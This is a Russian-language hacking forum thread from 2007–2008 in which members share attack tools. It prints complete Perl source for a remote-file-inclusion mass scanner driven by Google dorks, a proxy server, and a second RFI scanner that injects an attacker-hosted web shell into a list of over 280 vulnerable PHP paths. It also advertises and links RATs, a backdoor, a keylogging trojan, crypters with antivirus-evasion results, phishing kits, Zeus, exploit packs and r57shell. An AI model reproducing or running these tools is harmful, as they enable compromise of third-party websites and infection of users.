http://rapidshare.com/files/55202841/RapidH4x1d.zip
http://rapidshare.com/files/55202839/R4pidH4x1d_-_no_remove.zip
http://rapidshare.com/files/55202842/RapidH4x1d2.zip
http://rapidshare.com/files/55202840/RapidH4x1d2_-_no_remove.zip
Автор: Creeping Death 17.10.2007, 22:46
STNC 0day tool google-php-include-bugs searcher v 0.8
CODE
#! /usr/bin/perl
# ================================================================ #
#
[/indent]google-php-include-bugs searcher v 0.8 #
# #
# #
# #
# ATTENTION. THIS SCRIPT IS PRIVATE. #
# .NOT FOR SALE. #
# #
# Usage: perl script.pl --log=<log-file> --url=<test-script-url> #
# Test script: #
# <?php #
# error_reporting(0); #
# $s = md5("STNC"); #
# $code = eregi("windows", php_uname())+ #
# 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ #
# 4*ini_get('safe_mode'); echo $s."[$code]".$s; #
# ?> #
# ================================================================ #
use IO::Socket;
@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat",
"inc", "incl", "include", "read", "write", "data", "code", "fname",
"filename", "cont", "content", "menu", "open", "file", "id", "p", "f",
"seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo",
"corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu",
"conteudo");
@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am",
"info", "name", "aero", "biz", "edu", "ws", "in",
"cn", "us", "be", "it", "cc", "tv", "ru", "su",
"jp", "kz", "se", "is", "ca", "gs", "ms", "vg",
"be", "fi", "gov");
@ftypes = ("php", "php3");
$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");
for($i = 0; $i < @ARGV; $i++)
{
if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; }
elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; }
}
if(!($script && $log)){ usage(); exit; }
foreach $inc(@inc_bugs)
{
foreach $zone(@zones)
{
foreach $ftype(@ftypes)
{
$request = "filetype:$ftype site:$zone inurl:$inc=";
print "\n[$request]\n";
$request =~ s/(.)/sprintf("%%%02x",ord($1))/eg;
@dn = ();
for($i = 0;$i < 10; $i++)
{
@temp = get("http://www.google.com/search?filter=0&num=100&start=".$i.
"00&q=$request") =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi;
foreach $url (@temp)
{
if($url !~ /($inc=[^\&]+)/i) { next; }
$left = $`; $right = $';
if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; }
if($url =~ /google\.com/i){ next; }
($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/;
if($domain =~ /^www\.(.+)$/) { $domain = $1; }
$f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;}
push @dn, $domain;
$print = "$left$inc=[INCLUDE]$right";
if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i)
{
$s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n";
$count++;
print "[$count] $s";
open LOG, ">>$log";
print LOG $s;
close LOG;
}
else {
print "$print - no bugs\n";
}
}
}
}
}
}
sub timeout() { close $sock; }
sub get()
{
local $request = $_[0];
local $port = 80;
local $data = "";
if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }
$sock = IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
TimeOut => $timeout
) or return 0; # connection failed
print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";
$SIG{ALRM} = \&timeout; alarm 10;
while(<$sock>){ $data .= $_; }
alarm 0; close $sock;
}
return $data;
}
sub usage()
{
print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+
2*eregi("apache", getenv("SERVER_SOFTWARE"))+
4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
);
}
давно уже не приват=) но..но может кому-нибудь пригодится.
SaTaNiC Team 0day tool Satanic Socks Server v0.8-perlCODE
#!/usr/bin/perl
#
Satanic Socks Server v0.8.031206-perl
# This script is private. Only for SaTaNiC team and friends. Not for sale.
#
Coded by drmist/STNC, web: www.stnc.ru.
$auth_enabled = 0;
$auth_login = "user";
$auth_pass = "pass";
$port = 3003;
use IO::Socket::INET;
$SIG{'CHLD'} = 'IGNORE';
$bind = IO::Socket::INET->new(Listen=>10, Reuse=>1, LocalPort=>$port) or die "Can't bind port $port\n";
while($client = $bind->accept()) {
$client->autoflush();
if(fork()){ $client->close(); }
else { $bind->close(); new_client($client); exit(); }
}
sub new_client {
local $t, $i, $buff, $ord, $success;
local $client = $_[0];
sysread($client, $buff, 1);
if(ord($buff) == 5) {
sysread($client, $buff, 1);
$t = ord($buff);
unless(sysread($client, $buff, $t) == $t) { return; }
$success = 0;
for($i = 0; $i < $t; $i++) {
$ord = ord(substr($buff, $i, 1));
if($ord == 0 && !$auth_enabled) {
syswrite($client, "\x05\x00", 2);
$success++;
break;
}
elsif($ord == 2 && $auth_enabled) {
unless(do_auth($client)){ return; }
$success++;
break;
}
}
if($success) {
$t = sysread($client, $buff, 3);
if(substr($buff, 0, 1) == '\x05') {
if(ord(substr($buff, 2, 1)) == 0) { # reserved
($host, $raw_host) = socks_get_host($client);
if(!$host) { return; }
($port, $raw_port) = socks_get_port($client);
if(!$port) { return; }
$ord = ord(substr($buff, 1, 1));
$buff = "\x05\x00\x00".$raw_host.$raw_port;
syswrite($client, $buff, length($buff));
socks_do($ord, $client, $host, $port);
[indent] }
}
} else { syswrite($client, "\x05\xFF", 2); };
}
$client->close();
}
sub do_auth {
local $buff, $login, $pass;
local $client = $_[0];
syswrite($client, "\x05\x02", 2);
sysread($client, $buff, 1);
if(ord($buff) == 1) {
sysread($client, $buff, 1);
sysread($client, $login, ord($buff));
sysread($client, $buff, 1);
sysread($client, $pass, ord($buff));
if($login eq $auth_login && $pass eq $auth_pass) {
syswrite($client, "\x05\x00", 2);
return 1;
} else { syswrite($client, "\x05\x01", 2); }
}
$client->close();
return 0;
}
sub socks_get_host {
local $client = $_[0];
local $t, $ord, $raw_host;
local $host = "";
sysread($client, $t, 1);
$ord = ord($t);
if($ord == 1) {
sysread($client, $raw_host, 4);
@host = $raw_host =~ /(.)/g;
$host = ord($host[0]).".".ord($host[1]).".".ord($host[2]).".".ord($host[3]);
} elsif($ord == 3) {
sysread($client, $raw_host, 1);
sysread($client, $host, ord($raw_host));
$raw_host .= $host;
} elsif($ord == 4) {
#ipv6 - not supported
}
return ($host, $t.$raw_host);
}
sub socks_get_port {
local $client = $_[0];
local $raw_port, $port;
sysread($client, $raw_port, 2);
$port = ord(substr($raw_port, 0, 1)) << 8 | ord(substr($raw_port, 1, 1));
return ($port, $raw_port);
}
sub socks_do {
local($t, $client, $host, $port) = @_;
if($t == 1) { socks_connect($client, $host, $port); }
elsif($t == 2) { socks_bind($client, $host, $port); }
elsif($t == 3) { socks_udp_associate($client, $host, $port); }
else { return 0; }
return 1;
}
# this part of code was taken from datapipe.pl utility,
# written by CuTTer (cutter[at]real.xakep.ru)
# utility lays on cpan.org
sub socks_connect {
my($client, $host, $port) = @_;
my $target = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM);
unless($target) { return; }
$target->autoflush();
while($client || $target) {
my $rin = "";
vec($rin, fileno($client), 1) = 1 if $client;
vec($rin, fileno($target), 1) = 1 if $target;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout && !$eout) { return; }
my $cbuffer = "";
my $tbuffer = "";
if ($client && (vec($eout, fileno($client), 1) || vec($rout, fileno($client), 1))) {
my $result = sysread($client, $tbuffer, 1024);
if (!defined($result) || !$result) { return; }
}
if ($target && (vec($eout, fileno($target), 1) || vec($rout, fileno($target), 1))) {
my $result = sysread($target, $cbuffer, 1024);
if (!defined($result) || !$result) { return; }
}
if ($fh && $tbuffer) { print $fh $tbuffer; }
while (my $len = length($tbuffer)) {
my $res = syswrite($target, $tbuffer, $len);
if ($res > 0) { $tbuffer = substr($tbuffer, $res); } else { return; }
}
while (my $len = length($cbuffer)) {
my $res = syswrite($client, $cbuffer, $len);
if ($res > 0) { $cbuffer = substr($cbuffer, $res); } else { return; }
}
}
}
sub socks_bind {
my($client, $host, $port) = @_;
# not supported
}
sub socks_udp_associate {
my($client, $host, $port) = @_;
# not supported
}
аналогично;)
PlainShell http://www.plain-text.info/plainshell
Автор: Creeping Death 19.10.2007, 18:32
Free Cryptor build 002
(IMG:http://www.soft.glofff.com/img/screen/freecryptor1.png)
Download: http://www.soft.glofff.com/downloads/fc.rar
Official web site: http://soft.glofff.com
A-Squared Found nothing
AntiVir Found TR/Crypt.XPACK.Gen
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found Mal/Basine-C
VirusBuster Found nothing
VBA32 Found nothing
Thx to Prosto
Автор: Creeping Death 28.10.2007, 00:19
небольшой backdoor, написанный на Delphi. вчера еще не палился.
CODE
A-Squared Found nothing
AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
CPsecure Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
Panda Antivirus Found nothing
Rising Antivirus Found nothing
Sophos Antivirus Found nothing
VirusBuster Found nothing
VBA32 Found nothing
автор: Ryan
аттач
Автор: Creeping Death 28.10.2007, 13:00
Joomla rfi Scanner
Heres a simple scanner for the web app Joomla. Scans known vulnerable RFI path/files in Joomla and reports http response.
Cпасибо d3hydr8
http://www.md5this.com/joomlascan.rar
Автор: неузнаваемый 10.12.2007, 16:58
BlackEnergy bot 1.9.2.rar Приклеен вирус так что запускаем на виртуальной машине!
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
Связка эксплойтов - FirePack
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
r57shell v1.4
+ выполнение команд без перезагрузки страницы (команда !cls - очистка текстовой области)
+ добавление алиасов (вид: !алиас; как пример - два алиаса !ll и !ds, подробности в коде скрипта)
+ php_admin* bypass by ini_restore()
+ error_log() safe_mode bypass
+ htaccess mail.force_extra_parameters safemode bypass
+ SSI safe_mode bypass
+ COM functions safe_mode bypass
+ ionCube extension safe_mode bypass
+ win32std extension safe_mode bypass
+ win32service extension safe_mode bypass
+ perl extension safe_mode bypass
+ FFI extension safe_mode bypass
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
ad pack
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
система распределения траффика
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
zeus v1.0.3.7 + админка и мануал
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
пока все
Автор: неузнаваемый 17.12.2007, 14:15
Sqlninja 0.2.1-r1
Sqlninja - маленький инструмент на Perl для эксплуатации уязвимости SQL-injection. Его главная цель состоит в том, чтобы обеспечить удаленный доступ к уязвимому серверу базы данных. В этойверсии можно выделить такие изменения, как улучшение механизма распознования, добавление брутофорс атаки, устранение некоторых ошибок из предыдущей версии.
http://www.web-hack.ru.hosted.by.0x7.net/soft/brut/sqlninja-0.2.1-r1.tgz
http://www.web-hack.ru/
Автор: неузнаваемый 19.12.2007, 13:14
CZ stat for "agent dq" new!
wowloader 0.8c
ntechloader 1.2se
Mpack 0.99
SASH.cc site 2007
N-spy and N-code
Nuclear traff new!
pass:123
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.
не проверял на вирусы так что на ваш страх и риск
Автор: Creeping Death 2.01.2008, 16:18
Fishing_Bait_2.5
http://rs100.rapidshare.com/files/51327122/Fishing_Bait_2.5_-_www.SilentHex.info.rar
Автор: Creeping Death 3.01.2008, 18:50
MultiBinder 1.1 Fully Undetected
http://www.fileshare.ro/452977910.405
Hav-Rat 1.2 [Private Version]
http://rapidshare.com/files/77201630/Hav-Rat_1.2_Private_Edition.rar
NyTrojan OCX
Function :
1) OpenCDRom
2) CloseCDRom
3) ShowTaskBar
4) HideTaskBar
5) HideMouse
6) ShowMouse
7) LockExe
8) UnLockExe
9) HideClock
10) ShowClock
11) HideStart
12) ShowStart
13) HideIcons
14) ShowIcons
15) DisableTaskManager
16) EnableTaskManager
17) EmptyFolder
18) DesktopFolderFlood
19) DesktopFolderDelete
20) DisableSystemRestore
21) EnableSystemRestore
22) KillProcess
23) AutoDownload
24) SetStartButtonCaption
25) AddToStartUp
26) FreezeMouse
27) StopFreezeMouse
28) CrazyMouse
29) StopCrazyMouse
30) BeepFlood
31) StopBeepFlood
32) Abort
33) LogOff
34) ShutDown
35) Restart
36) Author
37) OpenWebSite
38) FormatDrive
39) SwapMouseButtons
40) StopSwapMouseButtons
41) BypassWindowsFirewall
42) TurnOffMonitor
43) TurnOnMonitor
44) StartKeylogging
45) StopKeylogging
46) Keylog
http://rapidshare.com/files/79649642/NyTrOjan.ocxhttp://www.speedyshare.com/590347578.html
http://uploaded.to/?id=wltwes
http://www2.eushare.com/download.php?file=NyTrOjan.ocx
http://www.netdrive.ws/40441.html
Zombie Rat v1.0
C0der:"The Bo$$"
Coded in : 90% Delphi, 10%Asm
http://rapidshare.com/files/79701258/ZombieRat.cab.html
Автор: Creeping Death 3.01.2008, 19:16
Scaner RFI cu >400 buguri
CODE
#!/usr/bin/perl
# RFI Web Comp v.1 - Public Version
# Code by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
use HTTP::Request;
use LWP::UserAgent;
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title RFI Web Comp v.1 - By JosS");
system ("color 02");
}
}
&lw;
print "\t\t########################################################\n\n";
print "\t\t# RFI Web Comp .v1 - Spanish Hackers Team #\n\n";
print "\t\t# by JosS #\n\n";
print "\t\t########################################################\n\n";
print "Insert host:(ex: http://www.site.com/)\n";
$host=<STDIN>;
chomp $host;
print "\n";
# Si la url no tiene http: al principio
if ( $host !~ /^http:/ ) {
# lo añadimos
$host = 'http://' . $host;
}
# Si la url no tiene / al final
if ( $host !~ /\/$/ ) {
# lo añadimos
$host = $host . '/';
}
print "Insert shell:(ex: http://www.site.com/c99.txt)\n";
$shell=<STDIN>;
chomp $shell;
print "\n";
# Si la url no tiene http: al principio
if ( $shell !~ /^http:/ ) {
# lo añadimos
$shell = 'http://' . $shell;
}
print "Insert string search:(ex: c99shell)\n";
$string=<STDIN>;
chomp $string;
print "\n\n";
print "Your config:\n\n";
print " Victim: $host \n";
print " Url Shell: $shell \n";
print " Search String: $string \n\n";
print "Scan...\n\n";
$vuln1="includes/header.php?systempath=";
$vuln2="amboro/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=";
$vuln3="index.inc.php?PATH_Includes=";
$vuln4="nphp/nphpd.php?nphp_config[LangFile]=";
$vuln5="include/db.php?GLOBALS[rootdp]=";
$vuln6="ashnews.php?pathtoashnews=";
$vuln7="ashheadlines.php?pathtoashnews=";
$vuln8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln9="demo/includes/init.php?user_inc=";
$vuln10="jaf/index.php?show=";
$vuln11="inc/shows.inc.php?cutepath=";
$vuln12="poll/admin/common.inc.php?base_path=";
$vuln13="pollvote/pollvote.php?pollname=";
$vuln14="sources/post.php?fil_config=";
$vuln15="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln16="bb_lib/checkdb.inc.php?libpach=";
$vuln17="include/livre_include.php?no_connect=lol&chem_absolu=";
$vuln18="index.php?from_market=Y&pageurl=";
$vuln19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln20="pivot/modules/module_db.php?pivot_path=";
$vuln21="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln22="derniers_commentaires.php?rep=";
$vuln23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$vuln26="coppermine/themes/maze/theme.php?THEME_DIR=";
$vuln28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$vuln29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$vuln30="myPHPCalendar/admin.php?cal_dir=";
$vuln31="agendax/addevent.inc.php?agendax_path=";
$vuln32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$vuln34="main.php?page=";
$vuln35="default.php?page=";
$vuln36="index.php?action=";
$vuln37="index1.php?p=";
$vuln38="index2.php?x=";
$vuln39="index2.php?content=";
$vuln40="index.php?conteudo=";
$vuln41="index.php?cat=";
$vuln42="include/new-visitor.inc.php?lvc_include_dir=";
$vuln43="modules/agendax/addevent.inc.php?agendax_path=";
$vuln44="shoutbox/expanded.php?conf=";
$vuln45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln46="pivot/modules/module_db.php?pivot_path=";
$vuln47="library/editor/editor.php?root=";
$vuln48="library/lib.php?root=";
$vuln49="e107/e107_handlers/secure_img_render.php?p=";
$vuln50="zentrack/index.php?configFile=";
$vuln51="main.php?x=";
$vuln52="becommunity/community/index.php?pageurl=";
$vuln53="GradeMap/index.php?page=";
$vuln54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$vuln55="calendar/calendar.php?serverPath=";
$vuln56="calendar/functions/popup.php?serverPath=";
$vuln57="calendar/events/header.inc.php?serverPath=";
$vuln58="calendar/events/datePicker.php?serverPath=";
$vuln59="calendar/setup/setupSQL.php?serverPath=";
$vuln60="calendar/setup/header.inc.php?serverPath=";
$vuln61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$vuln62="zentrack/index.php?configFile=";
$vuln63="pivot/modules/module_db.php?pivot_path=";
$vuln64="inc/header.php/step_one.php?server_inc=";
$vuln65="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln66="inc/pipe.php?HCL_path=";
$vuln67="include/write.php?dir=";
$vuln68="include/new-visitor.inc.php?lvc_include_dir=";
$vuln69="includes/header.php?systempath=";
$vuln70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln71="coppercop/theme.php?THEME_DIR=";
$vuln72="zentrack/index.php?configFile=";
$vuln73="pivot/modules/module_db.php?pivot_path=";
$vuln74="inc/header.php/step_one.php?server_inc=";
$vuln75="install/index.php?lng=../../include/main.inc&G_PATH=";
$vuln76="inc/pipe.php?HCL_path=";
$vuln77="include/write.php?dir=";
$vuln78="include/new-visitor.inc.php?lvc_include_dir=";
$vuln79="includes/header.php?systempath=";
$vuln80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$vuln81="coppercop/theme.php?THEME_DIR=";
$vuln82="becommunity/community/index.php?pageurl=";
$vuln83="shoutbox/expanded.php?conf=";
$vuln84="agendax/addevent.inc.php?agendax_path=";
$vuln85="myPHPCalendar/admin.php?cal_dir=";
$vuln86="yabbse/Sources/Packages.php?sourcedir=";
$vuln87="dotproject/modules/projects/addedit.php?root_dir=";
$vuln88="dotproject/modules/projects/view.php?root_dir=";
$vuln89="dotproject/modules/projects/vw_files.php?root_dir=";
$vuln90="dotproject/modules/tasks/addedit.php?root_dir=";
$vuln91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$vuln92="My_eGallery/public/displayCategory.php?basepath=";
$vuln93="modules/My_eGallery/public/displayCategory.php?basepath=";
$vuln94="modules/4nAlbum/public/displayCategory.php?basepath=";
$vuln95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$vuln96="modules/agendax/addevent.inc.php?agendax_path=";
$vuln97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$vuln99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$vuln100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$vuln101="shoutbox/expanded.php?conf=";
$vuln102="pivot/modules/module_db.php?pivot_path=";
$vuln103="library/editor/editor.php?root=";
$vuln104="library/lib.php?root=";
$vuln105="e107/e107_handlers/secure_img_render.php?p=";
$vuln106="main.php?x=";
$vuln107="main.php?page=";
$vuln108="index.php?meio.php=";
$vuln109="index.php?include=";
$vuln110="index.php?inc=";
$vuln111="index.php?page=";
$vuln112="index.php?pag=";
$vuln113="index.php?p=";
$vuln114="index.php?x=";
$vuln115="index.php?open=";
$vuln116="index.php?visualizar=";
$vuln117="index.php?pagina=";
$vuln118="index2.php?content=";
$vuln119="inc/step_one_tables.php?server_inc=";
$vuln120="GradeMap/index.php?page=";
$vuln121="phpshop/index.php?base_dir=";
$vuln122="admin.php?cal_dir=";
$vuln123="contacts.php?cal_dir=";
$vuln124="convert-date.php?cal_dir=";
$vuln125="album_portal.php?phpbb_root_path=";
$vuln126="mainfile.php?MAIN_PATH=";
$vuln127="dotproject/modules/files/index_table.php?root_dir=";
$vuln128="html/affich.php?base=";
$vuln129="gallery/init.php?HTTP_POST_VARS=";
$vuln130="pm/lib.inc.php?pm_path=";
$vuln131="ideabox/include.php?gorumDir=";
$vuln132="index2.php?includes_dir=";
$vuln133="forums/toplist.php?phpbb_root_path=";
$vuln134="forum/toplist.php?phpbb_root_path=";
$vuln135="admin/config_settings.tpl.php?include_path=";
$vuln136="include/common.php?include_path=";
$vuln137="event/index.php?page=";
$vuln138="forum/index.php?includeFooter=";
$vuln139="forums/index.php?includeFooter=";
$vuln140="forum/bb_admin.php?includeFooter=";
$vuln141="forums/bb_admin.php?includeFooter=";
$vuln142="language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$vuln144="blend_data/blend_common.php?phpbb_root_path=";
$vuln145="master.php?root_path=";
$vuln146="includes/kb_constants.php?module_root_path=";
$vuln147="forum/includes/kb_constants.php?module_root_path=";
$vuln148="forums/includes/kb_constants.php?module_root_path=";
$vuln149="classes/adodbt/sql.php?classes_dir=";
$vuln150="agenda.php3?rootagenda=";
$vuln151="agenda2.php3?rootagenda=";
$vuln152="sources/lostpw.php?CONFIG[path]=";
$vuln153="topsites/sources/lostpw.php?CONFIG[path]=";
$vuln154="toplist/sources/lostpw.php?CONFIG[path]=";
$vuln155="sources/join.php?CONFIG[path]=";
$vuln156="topsites/sources/join.php?CONFIG[path]=";
$vuln157="toplist/sources/join.php?CONFIG[path]=";
$vuln158="topsite/sources/join.php?CONFIG[path]=";
$vuln159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=";
$vuln160="extras/poll/poll.php?file_newsportal=";
$vuln161="index.php?site_path=";
$vuln162="mail/index.php?site_path=";
$vuln163="fclick/show.php?path=";
$vuln164="show.php?path=";
$vuln165="calogic/reconfig.php?GLOBALS[CLPath]=";
$vuln166="eshow.php?Config_rootdir=";
$vuln167="auction/auction_common.php?phpbb_root_path=";
$vuln168="index.php?inc_dir=";
$vuln169="calendar/index.php?inc_dir=";
$vuln170="modules/TotalCalendar/index.php?inc_dir=";
$vuln171="modules/calendar/index.php?inc_dir=";
$vuln172="calendar/embed/day.php?path=";
$vuln173="ACalendar/embed/day.php?path=";
$vuln174="calendar/add_event.php?inc_dir=";
$vuln175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=";
$vuln176="claroline/auth/ldap/authldap.php?includePath=";
$vuln177="docebo/modules/credits/help.php?lang=";
$vuln178="modules/credits/help.php?lang=";
$vuln179="config.php?returnpath=";
$vuln180="editsite.php?returnpath=";
$vuln181="in.php?returnpath=";
$vuln182="addsite.php?returnpath=";
$vuln183="includes/pafiledb_constants.php?module_root_path=";
$vuln184="phpBB/includes/pafiledb_constants.php?module_root_path=";
$vuln185="pafiledb/includes/pafiledb_constants.php?module_root_path=";
$vuln186="auth/auth.php?phpbb_root_path=";
$vuln187="auth/auth_phpbb/phpbb_root_path=";
$vuln188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=";
$vuln189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=";
$vuln190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=";
$vuln191="phpdig/includes/config.php?relative_script_path=";
$vuln192="includes/phpdig/includes/config.php?relative_script_path=";
$vuln193="includes/dbal.php?eqdkp_root_path=";
$vuln194="eqdkp/includes/dbal.php?eqdkp_root_path=";
$vuln195="dkp/includes/dbal.php?eqdkp_root_path=";
$vuln196="include/SQuery/gameSpy2.php?libpath=";
$vuln197="include/global.php?GLOBALS[includeBit]=";
$vuln198="topsites/config.php?returnpath=";
$vuln199="manager/frontinc/prepend.php?_PX_config[manager_path]=";
$vuln200="ubbthreads/addpost_newpoll.php?addpoll=thispath=";
$vuln201="forum/addpost_newpoll.php?thispath=";
$vuln202="forums/addpost_newpoll.php?thispath=";
$vuln203="ubbthreads/ubbt.inc.php?thispath=";
$vuln204="forums/ubbt.inc.php?thispath=";
$vuln205="forum/ubbt.inc.php?thispath=";
$vuln206="forum/admin/addentry.php?phpbb_root_path=";
$vuln207="admin/addentry.php?phpbb_root_path=";
$vuln208="index.php?f=";
$vuln209="index.php?act=";
$vuln210="ipchat.php?root_path=";
$vuln211="includes/orderSuccess.inc.php?glob[rootDir]=";
$vuln212="stats.php?dir[func]=dir[base]=";
$vuln213="ladder/stats.php?dir[base]=";
$vuln214="ladders/stats.php?dir[base]=";
$vuln215="sphider/admin/configset.php?settings_dir=";
$vuln216="admin/configset.php?settings_dir=";
$vuln217="vwar/admin/admin.php?vwar_root=";
$vuln218="modules/vwar/admin/admin.php?vwar_root=";
$vuln219="modules/vWar_Account/includes/get_header.php?vwar_root=";
$vuln220="modules/vWar_Account/includes/functions_common.php?vwar_root2=";
$vuln221="sphider/admin/configset.php?settings_dir=";
$vuln222="admin/configset.php?settings_dir=";
$vuln223="impex/ImpExData.php?systempath=";
$vuln224="forum/impex/ImpExData.php?systempath=";
$vuln225="forums/impex/ImpExData.php?systempath=";
$vuln226="application.php?base_path=";
$vuln227="index.php?theme_path=";
$vuln228="become_editor.php?theme_path=";
$vuln229="add.php?theme_path=";
$vuln230="bad_link.php?theme_path=";
$vuln231="browse.php?theme_path=";
$vuln232="detail.php?theme_path=";
$vuln233="fav.php?theme_path=";
$vuln234="get_rated.php?theme_path=";
$vuln235="login.php?theme_path=";
$vuln236="mailing_list.php?theme_path=";
$vuln237="new.php?theme_path=";
$vuln238="modify.php?theme_path=";
$vuln239="pick.php?theme_path=";
$vuln240="power_search.php?theme_path=";
$vuln241="rating.php?theme_path=";
$vuln242="register.php?theme_path=";
$vuln243="review.php?theme_path=";
$vuln244="rss.php?theme_path=";
$vuln245="search.php?theme_path=";
$vuln246="send_pwd.php?theme_path=";
$vuln247="sendmail.php?theme_path=";
$vuln248="tell_friend.php?theme_path=";
$vuln249="top_rated.php?theme_path=";
$vuln250="user_detail.php?theme_path=";
$vuln251="user_search.php?theme_path=";
$vuln252="invoice.php?base_path=";
$vuln253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$vuln254="cgi-bin/install/index.php?G_PATH=";
$vuln255="cgi-bin/include/print_category.php?dir=";
$vuln256="includes/class_template.php?quezza_root_path=";
$vuln257="bazar/classified_right.php?language_dir=";
$vuln258="classified_right.php?language_dir=";
$vuln259="phpBazar/classified_right.php?language_dir=";
$vuln260="chat/messagesL.php3?cmd=";
$vuln261="phpMyChat/chat/messagesL.php3?cmd=";
$vuln262="bbs/include/write.php?dir=";
$vuln263="visitorupload.php?cmd=";
$vuln264="modules/center/admin/accounts/process.php?module_path]=";
$vuln265="index.php?template=";
$vuln266="armygame.php?libpath=";
$vuln267="lire.php?rub=";
$vuln268="pathofhostadmin/?page=";
$vuln269="apa_phpinclude.inc.php?apa_module_basedir=";
$vuln270="index.php?req_path=";
$vuln271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$vuln272="Farsi1/index.php?archive=";
$vuln273="index.php?archive=";
$vuln274="show_archives.php?template=";
$vuln275="forum/include/common.php?pun_root=";
$vuln276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$vuln277="vuln.php?=";
$vuln278="cgi-bin//include/write.php?dir=";
$vuln279="admin/common.inc.php?basepath=";
$vuln280="pm/lib.inc.php?sfx=";
$vuln281="pm/lib.inc.php?pm_path=";
$vuln282="artmedic-kleinanzeigen-path/index.php?id=";
$vuln283="osticket/include/main.php?include_dir=";
$vuln284="include/main.php?config[search_disp]=include_dir=";
$vuln285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$vuln286="quick_reply.php?phpbb_root_path=";
